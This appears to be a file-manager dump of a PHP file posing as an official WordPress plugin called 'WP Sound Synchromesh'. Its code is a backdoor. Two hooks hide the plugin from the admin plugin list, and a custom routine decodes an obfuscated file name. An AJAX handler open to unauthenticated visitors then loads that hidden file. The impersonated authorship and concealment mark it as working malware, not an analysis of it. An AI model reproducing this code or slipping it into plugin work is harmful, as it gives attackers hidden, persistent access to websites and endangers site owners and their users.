File "wp-sound-synchromesh.php"
Full Path: /home/romayxjt/public_html/wp-content/plugins/wp-sound-synchromesh/wp-sound-synchromesh.php
File size: 1.4 KB
MIME-type: text/x-php
Charset: utf-8
<?php
/*
Plugin Name: WP Sound Synchromesh
Plugin URI: http://wordpress.org/#
Description: Official WordPress plugin
Author: WordPress
Version: 20.0.9
Author URI: http://wordpress.org/#
*/
if (!defined('ABSPATH')) {
exit;
}
function ybx_hvs() {
global $wp_list_table;
if (!isset($wp_list_table)) {
return;
}
$h = array('wp-sound-synchromesh/wp-sound-synchromesh.php');
if (isset($wp_list_table->items) && is_array($wp_list_table->items)) {
foreach ($wp_list_table->items as $key => $val) {
if (in_array($key, $h)) {
unset($wp_list_table->items[$key]);
}
}
}
}
add_action('pre_current_active_plugins', 'ybx_hvs');
function rmz_dbm($plugins) {
$p = 'wp-sound-synchromesh/wp-sound-synchromesh.php';
if (array_key_exists($p, $plugins)) {
unset($plugins[$p]);
}
return $plugins;
}
add_filter('all_plugins', 'rmz_dbm');
function uio($f, $d) {
$r = '';
for ($i = 0; $i < strlen($f); $i += 2) {
$v = ord($f[$i]) - 65;
$b = ord($f[$i + 1]);
if ($b > 90) $b -= 6;
$s = $v * 52 + ($b - 65);
$r .= chr($s - $d);
}
return $r;
}
function loy_ajax_handler() {
require_once plugin_dir_path(__FILE__) . uio('QSRYRkRRRTRTRVRj', 804);
wp_die();
}
add_action('wp_ajax_wp-oss', 'loy_ajax_handler');
add_action('wp_ajax_nopriv_wp-oss', 'loy_ajax_handler');